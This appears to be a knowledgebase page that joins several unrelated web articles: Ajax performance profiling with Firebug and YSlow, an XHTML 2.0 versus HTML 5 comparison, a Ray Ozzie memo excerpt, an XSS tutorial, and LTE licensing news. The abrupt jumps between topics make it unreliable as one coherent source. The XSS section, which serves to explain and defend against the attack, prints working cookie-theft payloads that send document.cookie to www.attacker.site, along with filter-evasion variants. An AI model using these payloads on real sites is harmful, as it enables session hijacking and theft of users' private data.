Share your knowledge and create a knowledgebase.
Asynchronous JavaScript + XML (Ajax) continues to raise user expectations for interactivity and performance, and developers are increasingly treating Ajax as a must-have component of their Web applications. As more code is moved client side and the network model changes, the community is responding by building more tools to address the unique performance challenges of Ajax. Examine toolsets that find and correct performance problems within your Ajax-
enriched applications.
Performance is one of the primary motivations for enhancing applications with Ajax. Ajax can improve response time by communicating with the server without full-page requests. By reducing response time, Ajax can provide a significantly better user experience. However, analyzing and improving the performance of Ajax applications requires a different toolset than traditional Web applications. This article examines these tools and shows how to use them to find performance problems and make corrections.
An Ajax application’s performance is based on several aspects of a Web application:
* Server response time
* Network transfer time
* Client JavaScript processing time
In traditional Web application development, server response time is the primary focus for performance analysis. Most performance analysis measures the application server’s ability to quickly handle requests, carry out necessary application logic, and generate a response. In Ajax application development, this is still a critical aspect of the application’s performance but is generally well understood.
The tools
To understand what aspects of a Web application you need to improve, you must properly analyze the components of the application. This article looks at how you can use the Firebug extension to Firefox and the YSlow add-on to instrument a Web application. After you install these tools, connect to the site that you are developing and click YSlow on the Firefox status bar. This opens the YSlow interface in Firebug. Now click the Performance button. YSlow performs an analysis of your application and provides a report on the different parts of the network transfer time of your application, as Figure 1 shows.
Network transfer time
In most Web applications, network transfer time is the biggest bottleneck. With a YSlow report, you can analyze the different aspects of the network transfer to understand what can be done to decrease the transfer time.
Reducing HTTP requests
Every HTTP request requires some time for the request to be sent to the server and the response to be retrieved. Even when responses are small, there is still the baseline roundtrip time, which is referred to as latency. YSlow provides a grade based on how many HTTP requests are made. A large number of requests results in significantly slower load times. You can reduce HTTP requests by simplifying the page so that fewer components need to be loaded. You can reduce image requests by using CSS sprites. Tools that generate CSS sprites are available (see the Resources section). To reduce script and CSS requests, include them inline in the page or combine multiple scripts or CSS files together.
You can reduce HTTP requests by providing HTTP cache expiration headers with future dates that allow browsers to cache components. It is important that as a user navigates from page to page, or returns to visit your site, that components can be cached and do not need to be downloaded each time your site is visited. Proxies can also cache frequently loaded content if proper expiration headers are provided. An expiration header looks like this:
Expires: Wed, 10 Mar 2009 10:00:00 GMT
Remember that if you use far future expiration dates, browsers will still cache your content even when you have changed it. You may want to reduce the expiration to a day in the future. You can also change filenames when you version them so that new URLs are requested when a new version is released, and the browser has to make a new request. You can configure Apache to add expiration headers with an ExpiresDefault directive:
ExpiresDefault "access plus 10 years"
With YSlow, you can also look at the total download size of your page by clicking the Stats button. YSlow shows the size of the page for a first-time visitor (with nothing cached) and for subsequent page visits (when caching can be used).
Alternate DNS lookup
HTTP requests can involve more than a just a roundtrip to your server. If there are multiple host or domain names used by resources, the browser may need to do additional Domain Name System (DNS) lookups. YSlow alerts you if multiple names must be looked up. However, it is important to note that multiple DNS names can actually be a performance benefit as well. Most browsers only allow two connections per host name. But with multiple host names, more connections — and consequently, more concurrent downloading — can take place.
Reducing the size of component transfers
In addition to reducing the number of HTTP requests, it is also advantageous to reduce the size of the components that are requested. Techniques can be applied to compress certain formats. YSlow indicates what techniques can be successfully applied to reduce response size.
You can shrink JavaScript code, CSS, and HTML by eliminating unnecessary whitespace and comments. You can further compress JavaScript code by renaming variables. Packer and YUI compressor are effective tools for JavaScript compression, and YUI compressor supports CSS compression as well. You can compare minifiers with The JavaScript CompressorRater.
One of the most effective ways to compress resources is by enabling gzip (short for GNU zip) for text-based resources. Using gzip, you can generally reduce content size by about 70%. Do not use gzip to compress resources that are already compressed, such as images and movies. Good candidates for gzip include CSS, HTML, JavaScript code, XML, and JavaScript Serialized Object Notation (JSON). Apache 1.3 supports gzip with mod_gzip and Apache 2.0 uses mod_deflate.
Not only is it important to minimize the size of HTTP responses in terms of resource size, but it is also important to minimize the size of HTTP requests. For many Internet users, upload speeds can be significantly slower than downloads, and so performance can be more sensitive to request size. Large URLs, large post data, and excessive headers can also increase the size of a request. In Firebug, you can go to the Net tab to view your requests, as Figure 2 shows. For each request, you can expand the request to see the request headers. One of the most common sources of unnecessarily large header sizes is large cookies. Cookies are included in the header on every request, and, therefore, large cookies add a lot of extra overhead.
Other network transfer performance improvements
Another YSlow recommendation is to use a content delivery network (CDN). A CDN provides a distributed network of servers with content that is closer to your end users for faster response times.
You can also improve the speed of rendering your Web pages by properly ordering your CSS and scripts. YSlow analyzes the position of your CSS and script declarations to provide information on how to improve the ordering. It is recommended that CSS declarations be at the top of the page so the CSS can immediately be used for rendering, and the scripts be at the bottom of the page so the page can render before loading the JavaScript code for interaction.
JavaScript processing time
After your Web page is successfully generated by the server and transferred to the browser, Ajax applications generally rely on JavaScript code for interactivity with the user. Most users are prepared to wait a little while for a page to fully download, but quality interaction depends on rapid feedback, so quick response to various components on your page can be the most important aspect of an enjoyable user experience. Also, browsers are usually still responsive when waiting for resources to download, but if JavaScript code is executing continuously, it can completely lock up the browser.
Firebug comes with a profiling tool. To use the profiler, go to the Console tab and click Profile to start the profiler. It may help to understand what part of your Web application makes heavy use of JavaScript code. The profiler also yields more accurate results if you can repeat the activity you are testing several times. For example, if there is a significant amount of JavaScript code that is executed when the page loads, you may want to do several page loads. If there are JavaScript hover event handlers, you may want to move the mouse around the page for a while to let the profiler collect a decent amount of information. When you finish your activity, you can click the Profile button again to display the profile results, as Figure 3 shows.
The profile result lists all the function calls that took place during the profile. Each entry shows the number of times that the function was called and statistics on the processing time for the function call. There is a Time column that indicates the total amount of time spent waiting for the function to return, and there is an Own Time column that indicates the total amount of time spent waiting for the function to return minus the time the function spent waiting for calls it made to return. Own time is generally the most important time because it represents where the majority of the expensive processing is taking place, and this time is what the values in the Percent column are based on. By default, Firebug sorts on the Percent column, with the highest values at the top. This is a convenient way to read the profile because the most expensive calls are on top, and you can focus your efforts on improving the performance of these functions. With Firebug, it is easy to go to the function source; you can simply click on the entry in the list to go to the function.
When evaluating the performance of your JavaScript functions, it is also important to note the number of times the function was called. If it is called a large number of times, the function itself may not necessarily be slow (you can see the average processing time for the function), but it may simply be called too frequently. Sometimes poor performance can be a result of a function being used more frequently than expected. Hover event handlers such as onmousemove often produce a large number of events.
If you can determine that a certain function is taking an excessive amount of time in processing, you may want to look at your JavaScript code for possible problems.
Table 1. Slow JavaScript operations
| Operation | Description |
|---|---|
| DOM access | Interaction with the DOM is usually slower than normal JavaScript code. Interaction with the DOM is usually inevitable, but try to minimize it. For instance, dynamically creating HTML with strings and setting the innerHTML is usually faster than creating HTML with DOM methods. |
| eval | Whenever possible, avoid the eval method because significant overhead is involved in script evaluation. |
| with | Using with statements creates additional scope objects that slow variable access and create ambiguities. |
| for-in loops | Traverse arrays use the traditional for (var i=0; i<array.length;i++) instead of for-in loops. Unfortunately, most JavaScript environments have a slow implementation of for-in loops. |
Firefox with Firebug and YSlow is certainly the best choice for profiling. For Safari on Mac OS X, you can also use Web Inspector to analyze HTTP requests. For JavaScript performance profiling, you can use manual techniques to gauge the performance of certain functions. To instrument a function manually, you can measure the execution time with the Date function, as Listing 1 shows:
Listing 1. Manual method timing
function myFunctionToTest() {
var start = new Date().getTime();
… // body of the function
var totalTime = new Date().getTime() - start;
}
One particular problem that can plague performance is the poor memory management of Windows® Internet Explorer®. Unpatched Internet Explorer 6 and prior versions exhibit progressively slower behavior as more objects and properties are created. As a general rule, if you have more than 5000 objects, old versions of Internet Explorer will be considerably slower.
Conclusion
Using Firebug and YSlow, you can thoroughly analyze your Web applications to make educated changes to improve performance. YSlow provides detailed information to assist in reducing network transfer times. Firebug provides detailed JavaScript profiling analysis to determine critical areas of code to improve. Together, these tools can help you build Web applications with performance that provides the highest level of user experience.
Overview of XHTML 2.0
XHTML 2.0 is based solely on XML, forgoing the SGML heritage and syntax peculiarities present in current web markup. XHTML 2.0 is supposed to be a “general-purpose language,” with a minimal default feature set that is easy to extend using CSS and other technologies (XForms, XML Events, etc). It’s a modular approach that allows the XHTML2 group to focus on generic document markup, while others develop mechanisms for presentation, interactivity, document construction, etc.
Priority one for the XHTML2 working group is to further separate document content and structure from document presentation. Other goals include increased usability and accessibility, improved internationalization, more device independence, less scripting, and better integration with the Semantic Web. The group has been less concerned with backward compatibility than their predecessors (and the HTML working group), which has led them to drop some of the syntactic baggage present in earlier incarnations of HTML. The result is a cleaner, more concise language that corrects many of Web markup’s past indiscretions.
Overview of HTML 5
While XHTML 2.0 aims to be revolutionary, the HTML working group has taken a more pragmatic approach and designed HTML 5 as an evolutionary technology. That is to say, HTML 5 is an incremental step forward that remains mostly compatible with the current HTML 4/XHTML 1 standards. However, HTML 5 offers a host of changes and extensions to HTML 4/XHTML 1 that address many of the faults in these earlier specifications.
HTML 5 is about moving HTML away from document markup, and turning it into a language for web applications. To that end, much of the specification focuses on creating a more robust, feature-ful client side environment for web application development by providing a variety of APIs. Among other things, the spec stipulates that complying implementations must provide client-side persistent storage (both key/value and SQL storage engines), audio and video playback APIs, 2D drawing through the canvas element, cross-document messaging, server-sent events, and a networking API.
The HTML 5 specification maintains an SGML-like syntax that is compatible with the current HTML specifications (though some of the more esoteric features of SGML are no longer supported). Also included in the specification is a second “XML Serialization” which allows developers to serve valid XML documents as well. Again, by maintaining an SGML-like serialization the HTML 5 working group has struck a balance between pragmatism and progress. Developers can choose to markup content using either the HTML serialization (which looks more like HTML 4.x) or the XML serialization (which looks more like XHTML 1.x).
Similar Features
It shouldn’t be too surprising that both working groups are proposing a number of similar features. These features address familiar pain points for web developers, and should be welcome additions to the next generation of markup languages.
Removal of Presentational Elements
A number of elements have been removed from both XHTML 2.0 and HTML 5 because they are considered purely presentational. The consensus is that presentation should be handled using style sheets.
HTML 5 and XHTML 2.0 documents cannot contain these elements: basefont, big, font, s, strike, tt, and u. XHTML 2.0 also removes the small, b, i, and hr elements, while HTML 5 redefines them with non-presentational meanings. In XHTML 2.0, the hr element has been replaced with separator in an attempt to reduce confusion (since the hr element, which stands for horizontal rule, is not necessarily either of those things).
Navigation Lists
Navigation lists have been introduced in both XHTML 2.0 and HTML 5. In XHTML 2.0, navigation is marked up using the new nl element. Navigation lists must start with a child label element that defines the list title. Following the title, one or more li elements are used to markup links. Also new in XHTML 2.0 is the ability to create a hyperlink from any element using the href attribute. Combining these features produces simple, lightweight navigation markup:
<nl>
<label>Category</label>
<li href="/">All</li>
<li href="/news">News</li>
<li href="/videos">Videos</li>
<li href="/images">Images</li>
</nl>
In HTML 5, the new nav element has been introduced for this purpose. Unfortunately, nav is not a list element, so it cannot contain child li elements to logically organize links (perhaps a new idiom will develop). And since anchor tags are still required to create hyperlinks in HTML 5, navigation markup is not quite as elegant:
<nav>
<h1>Category</h1>
<ul>
<li><a href="/">All</a></li>
<li><a href="/news">News</a></li>
<li><a href="/videos">Videos</a></li>
<li><a href="/images">Images</a></li>
</ul>
</nav>
Enhanced Forms
Both specifications have new features to create more robust, consistent forms with less scripting. In XHTML 2.0, standard HTML forms are dropped completely in favor of the more comprehensive XForms standard. The XHTML2 working group does not control this standard, but references it from the XHTML 2.0 specification. To facilitate reuse, XForms separates the data being collected from the markup of the controls. It’s a robust and powerful language, but a full description is way beyond the scope of this post. Suffice it to say, there will be a bit of a learning curve for web developers trying to get up to speed with this technology.
HTML 5 retains the familiar HTML forms, but adds several new data types to simplify development and improve usability. In HTML 5, several new types of input elements have been introduced for email addresses, URLs, dates and times, and numeric data. This will allow user agents to provide more sophisticated user interfaces (e.g., calendar date pickers), integrate with other applications (e.g., pulling addresses from Outlook or Address Book), and validate user input before posting data to the server (less client-side javascript validation).
Semantic Markup
Both working groups have embraced the coming Semantic Web by allowing developers to embed richer metadata in their documents. As with forms, the XHTML2 working group has embraced a more sophisticated technology, while the HTML working group has kept things simple.
In XHTML 2.0, metadata can be embedded by using several new global attributes from the Metainformation Attributes Module. In particular, the new global role attribute is intended to describe the meaning of a given element in the context of the document. The technical term is Embedding Structured Data in Web Pages. Again, the group leverages an existing standard by referencing RDF. The technology is extremely powerful, but it’s also complicated.
The HTML working group has taken an approach that feels more like microformats by overloading the class attribute with a predefined set of reserved classes to represent various types of data. The specification currently lists seven reserved classes: copyright, error, example, issue, note, search, and warning. While overloading the class attribute like this might be confusing, it’s unlikely that user agents will render elements with these classes differently. And the class names are specific enough that there’s little worry: if an element has its class set to copyright, it’s probably a copyright whether the developer knew about the reserved classes or not.
Only in HTML 5
There are several new features that the HTML 5 specification describes that have no counterparts in XHTML 2.0.
Web Application APIs
HTML 5 introduces several APIs that will drastically improve the client-side web development environment. These APIs are what set HTML 5 apart as a proposal for a technology stack for Web Applications, rather than simply a markup language for documents. It should be noted that the details of these APIs are being worked out by the Web API working group, so they may be adopted with or without the rest of HTML 5. The new APIs, and corresponding elements are:
* A 2D drawing API using the canvas element.
* An audio and video playback API, supporting the ability to offer multiple formats to user agents, which can be used with the new video and audio elements.
* Persistent storage on the client-side with support for both key/value and SQL databases.
* An offline web application API (similar to Google Gears).
* An API that allows Web Applications to register themselves for certain protocols or MIME types.
* An editing API that can be used in combination with the global contenteditable attribute.
* A drag & drop API that can be used with the draggable attribute.
* A network API allowing Web applications to communicate using TCP.
* An API that exposes the browser history, allowing applications to add to it so they don’t break the back button.
* A cross-document messaging API.
* Server-sent events in combination with the new event-source element.
New Elements
Several new elements are being introduced by HTML 5 that aren’t available in XHTML 2.0:
* figure represents an image or graphic with a caption. A nested legend represents the caption, while a normal img element is used for the image.
* m represents text that has been marked in some way. It could be used to highly search terms in resulting documents, for example.
* time represents dates and time.
* meter represents a measurement.
* datagrid represents an interactive tree list or tabular data.
* command represents a command that the user can invoke.
* event-source is used to “catch” server sent events.
* output represents some type of output, such as from a calculation done through scripting.
* progress represents a completion of a task, such as downloading or when performing a series of expensive operations.
In addition, several new elements will help semantically markup the parts of a document. They’re fairly self explanatory: section, article, header, footer, and aside. And a new dialog element is designed to represent conversations using child dt elements for the speaker’s name and dd elements for the text.
Track Users by Pinging URIs
The new ping attribute can be used on the a and area elements to do user tracking. Rather than using redirects, or relying on javascript, the ping attribute allows you to specify a space separated list of URIs that should be pinged when the hyperlink is followed.
Only in XHTML 2.0
Also notable are the following new features that are available only in XHTML 2.0.
Any Element can be a Hyperlink
In XHTML 2.0, any element can be the source of a hyperlink — the href attribute can appear on any element. With this change the a element is no longer necessary, but it is retained.
Any Element can be an Image (or other resource)
In XHTML 2.0, the img element has been dropped. No worries, though — any element can now be an image. The idea is that all images have a “long description” that is equivalent to the image itself. By placing a src attribute on any element, you’re telling the user agent to load that resource in place of the element. If, for whatever reason, the resource is unavailable, the element is used instead. This allows developers to provide multiple equivalent resources using different file formats and representations by nesting elements within one another.
Lines Replace Line Breaks
The venerable br element, used to insert line breaks, has also been dropped from XHTML 2.0. The new l element is being introduced to replace it. l represents a line of text, and behaves like a span followed by a br in today’s markup.
New Heading Construct
The new h and section elements have been introduced to replace the numbered h1 through h6 elements. The goal is to accurately represent the hierarchical structure of a document. The current numbered headings are linear, not nested. By nesting section and h elements within parent sections the document structure is made explicit.
New Elements
The XHTML2 working group has focused on creating a more generic, simplified language. To that end, they’ve refrained from adding numerous specialized elements to represent different types of content. They argue that the new role attribute provides a mechanism for including rich metadata, making specialized elements unnecessary. That said, a couple new elements were included:
* blockcode represents computer code.
* di represents a group of related terms and definitions in a dl (definition list). This is useful for words with multiple definitions, or multiple spellings.
* handler represents a scripted event handler, with a type attribute specifying the handler language. If the user agent doesn’t understand the language, the handler’s children are processed (otherwise they’re ignored). Handlers may be nested to provide multiple implementations in various languages.
Conclusion
Both proposals look promising, with lots of new features that address common web development problems. But neither specification is an official recommendation, and it’s likely to stay that way for some time.
Despite its late start, the HTML 5 working group seems to have more industry support, and is further along in the recommendation process. Their goal is to have a complete spec, with multiple interoperable implementations, by late 2010 (as I said before, though, the W3C has already missed some milestones in the approval process). With industry support from most of the major browser vendors (the only notable exception being Microsoft) it’s likely that this specification will be implemented quickly and consistently once it’s reached a stable state.
What everyone wants to avoid is another standards war. Fortunately, since both languages support XML namespaces (or, in the case of the HTML serialization of HTML 5, DOCTYPE switching) it’s unlikely that we’ll see the sort of browser dependent behavior we did in the 1990s. Standards wars aside, the future looks bright for web development. These new markup features and APIs will provide a rich environment for web development that should narrow the gap between Web and Desktop applications.
After a few years of trying to fill Bill Gates’ shoes as Microsoft’s chief software architect, Ray Ozzie is starting to hit his stride. In a remarkable strategy memo to employees (embedded below), Ozzie essentially shifts Microsoft’s mission from one of creating software for the PC and stand-alone servers to creating an interconnecting mesh between devices and people. He is not abandoning Windows or Office, but he is saying that the value of Microsoft’s software will increasingly depend less on what it can do on its own than what it can do with others. It is not about software anymore so much as it is about Web-based services. Ray, welcome to the club.
Excerpt:
Central to this strategy is our embrace of both a world of the web and a world of devices. Over the past ten years, the PC era has given way to an era in which the web is at the center of our experiences – experiences delivered not just through the browser but also through many different devices including PCs, phones, media players, game consoles, set-top boxes and televisions, cars, and more.
Guiding Principles
There are three overarching principles guiding our services strategy – principles informing the design and development of products being implemented across all parts of Microsoft, for both individuals and business.
1. The Web is the Hub of our social mesh and our device mesh.
The web is first and foremost a mesh of people. . . . All applications will grow to recognize and utilize the inherent group-forming aspects of their connection to the web, in ways that will become fundamental to our experiences. In scenarios ranging from productivity to media and entertainment, social mesh notions of linking, sharing, ranking and tagging will become as familiar as File, Edit and View. . . . To individuals, the concept of “My Computer” will give way to the concept of a personal mesh of devices – a means by which all of your devices are brought together, managed through the web, as a seamless whole.
2. The Power of “Choice” as business moves to embrace the cloud.
Most major enterprises are in the early stages of a significant infrastructural transition – from the use of dedicated and sometimes very expensive application servers, to the use of virtualization and commodity hardware to consolidate those enterprise applications on computing and storage grids constructed within their data center. . . . Driven in large part by the high-scale requirements of consumer services, the value of this utility computing model is most clearly evident in cloud-based internet services.
Software built explicitly to provide a significant level of server/service symmetry will afford choice and flexibility in developing, operating, migrating and managing such systems in highly varied enterprise deployment environments that are distributed and federated between the enterprise data center and the internet cloud.
3.Small Pieces Loosely Joined for developers, within the cloud and across a world of devices.
Application design patterns at both the front- and back-end are transitioning toward being compositions and in some cases loose federations of cooperating systems, where standards and interoperability are essential. . . . At a higher level, myriad options exist for delivering applications to the user: The web browser, unique in its ubiquity; the PC, unique in how it brings together interactivity/experience, mobility and storage; the phone, unique in its extreme mobility. Developers will need to build applications that can be delivered seamlessly across a loosely coupled device mesh by utilizing a common set of tools, languages, runtimes and frameworks – a common toolset that spans from the service in the cloud to enterprise server, and from the PC to the browser to the phone.
Cross-site scripting (XSS for short) is one of the most common application-level attacks that hackers use to sneak into Web applications. XSS is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Most attacks involve two parties: either the attacker and the Web site or the attacker and the client victim. Unlike those, the XSS attack involves three parties: the attacker, the client, and the Web site.
The goal of the XSS attack is to steal the client cookies or any other sensitive information that can identify the client with the Web site. With the token of the legitimate user in hand, the attacker can proceed to act as the user in interaction with the site, thus to impersonate the user. For example, in one audit conducted for a large company, it was possible to peek at the user’s credit card number and private information by using an XSS attack. This was achieved by running malicious JavaScript code on the victim (client) browser, with the access privileges of the Web site. These are the very limited JavaScript privileges that generally do not let the script access anything but site-related information. It is important to stress that, although the vulnerability exists at the Web site, at no time is the Web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. As a result, the attacker gets the cookies and impersonates the victim.
Explanation of the XSS technique
Let’s call the site under attack: www.vulnerable.site. At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it (thus not making sure that it doesn’t contain JavaScript code nor HTML tags. Suppose, therefore, that this script is named welcome.cgi, and its parameter is name. It can be operated this way:
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site
The response would be:
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker <BR>
Welcome to our system
…
</HTML>
How can this be abused? Well, the attacker manages to lure the victim client into clicking a link that the attacker supplies to the user. This is a carefully and maliciously crafted link that causes the Web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data to the script consists of JavaScript that accesses the cookies that the client browser has stored for www.vulnerable.site. This is allowed because the client browser "experiences" the JavaScript coming from www.vulnerable.site, and JavaScript security model allows scripts arriving from a particular site to access cookies that belong to that site.
Such a link looks like this one:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site …
The vulnerable site response would be:
<HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script>
<BR> Welcome to our system …
</HTML>
The victim client’s browser would interpret this response as an HTML page containing a piece of JavaScript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site. Therefore, it will pop up a window at the client browser showing all client cookies belonging to www.vulnerable.site.
Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a Web site (www.attacker.site) and use a script to receive the cookies. Instead of popping up a window, the attacker would write code that accesses a URL at www.attacker.site, thereby invoking the cookie-reception script, with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.
The malicious link would be:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open
("http://www.attacker.site/collect
.cgi?cookie="%2Bdocument.cookie)</script>
And the response page would look like:
<HTML> <Title>Welcome!</Title> Hi
<script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
<BR>
Welcome to our system … </HTML>
The browser, immediately upon loading this page, would execute the embedded JavaScript and send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached.
Note:
Causing the JavaScript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to an XSS attack. If the JavaScript Alert function can be called, there is usually no reason for the window.open call not to succeed. That is why most examples for XSS attacks use the Alert function, which makes it very easy to detect its success.
Scope and feasibility
The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in these ways:
* The attacker sends an e-mail message containing an HTML page that forces the browser to access the link. This requires the victim to use the HTML-enabled e-mail client, and the HTML viewer at the client is the same browser that is used for accessing www.vulnerable.site.
* The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise-active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing both this site and www.vulnerable.site.
The malicious JavaScript can access any of this information:
* Permanent cookies (of www.vulnerable.site) maintained by the browser
* RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site
* Names of other windows opened for www.vulnerable.site
* Any information that is accessible through the current DOM (from values, HTML code, and so forth)
Identification, authentication, and authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even when not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary, such as RAM cookies, then the client must be in session with www.vulnerable.site.
Anther possible implementation for an identification token is a URL parameter. In such cases, it is possible to access other windows by using JavaScript in this way (assuming that the name of the page with the necessary URL parameters is foobar):
<script>var victim_window=open(",’foobar’);alert(’Can access:
‘ +victim_window.location.search)</script>
Variations on this theme
It is possible to use many HTML tags, beside <SCRIPT> to run the JavaScript. In fact, it is also possible for the malicious JavaScript code to reside on another server and to force the client to download the script and execute it, which can be useful if a lot of code is to be run or when the code contains special characters.
A couple of variations on these possibilities:
* Rather than <script>…</script>, hackers can use <img src="javascript:…">. This is good for sites that filter the <script> HTML tag.
* Rather than <script>…</script>, it is possible to use <script src="http://…">. This is good for a situation where the JavaScript code is too long or when it contains forbidden characters.
Sometimes, the data embedded in the response page is found in non-free HTML context. In this case, it is first necessary to "escape" to the free context, and then to append the XSS attack. For example, if the data is injected as a default value of an HTML form field:
…
<input type=text name=user value="…">
…
Then it is necessary to include "> in the beginning of the data to ensure escaping to the free HTML context. The data would be:
"><script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
And the resulting HTML would be:
…
<input type=text name=user value=""><script>window.open
("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>">
…
Other ways to perform traditional XSS attacks
So far, we have seen that an XSS attack can take place in a parameter of a GET request that is echoed back to the response by a script. But it is also possible to carry out the attack with a POST request or by using the path component of the HTTP request — and even by using some HTTP headers (such as the Referer).
In particular, the path component is useful when an error page returns the erroneous path. In this case, including the malicious script in the path will often execute it. Many Web servers are found vulnerable to this attack.
What went wrong?
It is important to understand that, although the Web site is not directly affected by this attack (it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated nor read from the site), it is still a flaw in the privacy that the site offers its visitors, or clients. This is just like a site deploying an application with weak security tokens, whereby an attacker can guess the security token of a client and impersonate him or her.
The weak spot in the application is the script that echoes back its parameter, regardless of its value. A good script makes sure that the parameter is of a proper format, contains reasonable characters, and so on. There is usually no good reason for a valid parameter to include HTML tags or JavaScript code, and these should be removed from the parameter before it is embedded in the response or before processing it in the application, to be on the safe side.
How to secure a site against XSS attacks
It is possible to secure a site against an XSS attack in three ways:
1. By performing in-house input filtering (sometimes called input sanitation). For each user input — be it a parameter or an HTTP header — in each script written in-house, advanced filtering against HTML tags, including JavaScript code, should be applied. For example, the welcome.cgi script from the previous case study should filter the <script> tag after it is through decoding the name parameter. This method has some severe downsides, though:
* It requires the application programmer to be well-versed in security.
* It requires the programmer to cover all possible input sources (query parameters, body parameters of POST requests, HTTP headers).
* It cannot defend against vulnerabilities in third-party scripts or servers. For example, it won’t defend against problems in error pages in Web servers (which display the path of the resource).
2. By performing "output filtering," that is, filtering the user data when it is sent back to the browser, rather than when it is received by a script. A good example for this would be a script that inserts the input data to a database and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to the ones for input filtering.
3. By installing a third-party application firewall, which intercepts XSS attacks before they reach the Web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods in a generic way (including path and HTTP headers), regardless of the script or path from the in-house application, a third-party script, or a script describing no resource at all (for example, one designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and JavaScript patterns. If any match, the request is rejected, and the malicious input does not arrive at the server.
Ways to check whether your site is protected from XSS
Checking that a site is secure from XSS attacks is the logical conclusion of securing the site. Just like securing a site against XSS, checking that the site is indeed secure can be done manually (the hard way) or by using an automated Web application vulnerability-assessment tool, which offloads the burden of checking. The tool crawls the site and then launches all the variants that it knows against all of the scripts that it found by trying the parameters, the headers, and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, path) is checked with as many variations as possible, and if the response page contains the JavaScript code in a context where the browser can execute it, then an XSS vulnerability is exposed. For example, sending this text:
<script>alert(document.cookie)</script>
to each parameter of each script (through a JavaScript-enabled browser to reveal an XSS vulnerability of the simplest kind) the browser will pop up the JavaScript Alert window if the text is interpreted as JavaScript code. Of course, there are several variants; therefore, testing only that variant is insufficient. And, as you already learned, it is possible to inject JavaScript into various fields of the request: the parameters, the HTTP headers, and the path. However, in some cases (notably the HTTP Referer header), it is awkward to carry out the attack by using a browser.
Summary
Cross-site scripting is one of the most common application-level attacks that hackers use to sneak into Web applications, as well as one of the most dangerous. It is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as this article explains, this is often done without the knowledge of either the client or the organization being attacked.
To prevent Web sites being vulnerable to these malicious acts, it is critical that an organization implement both an online and offline security strategy. This includes using an automated vulnerability-assessment tool that can test for all of the common Web vulnerabilities and application-specific vulnerabilities (such as cross-site scripting) on a site. For a full online defense, it is also vital to install a firewall application that can detect and defend against any type of manipulation to the code and content sitting on and behind the Web servers.
Long-Term Evolution (LTE) is one step closer to industry-wide stability. 3GPP LTE technology (LTE is the name given to a project within the Third Generation Partnership Project) offers wireless broadband speeds with downloads around 100 Mbps and upload of 50 Mbps. Seven telecommunication companies have reached an agreement on a framework for licensing intellectual-property rights that relate to LTE. This agreement will make the transition to LTE easier because the fear of lawsuits will be reduced.
Alcatel-Lucent, Ericsson, NEC, NextWave Wireless, Nokia Siemens Networks and Sony Ericsson have agreed to an industry standard being called FRAND, which stands for Fair, Reasonable And Non-Discriminatory licensing terms. Notebook computers that use LTE will pay a combined maximum royalty in the single digits. Handsets will pay a single-digit royalty that is based on a percentage of the sales price of the device.
Ericsson Senior Vice President and CTO Hakan Eriksson said this agreement will “reassure operators of the early widespread adoption of LET technology throughout the consumer electronics industry.”
Industry giant Qualcomm has yet to sign onto the FRAND framework. Other companies like Verizon Wireless, China Mobile, Vodafone and NTT DoCoMo are working on their own versions of LTE.
The future may not be here yet but it could be by next year. Wireless high-speed access will go a long way to promoting services like high-resolution video streaming and innovative online games that can be accessed almost anywhere at any time.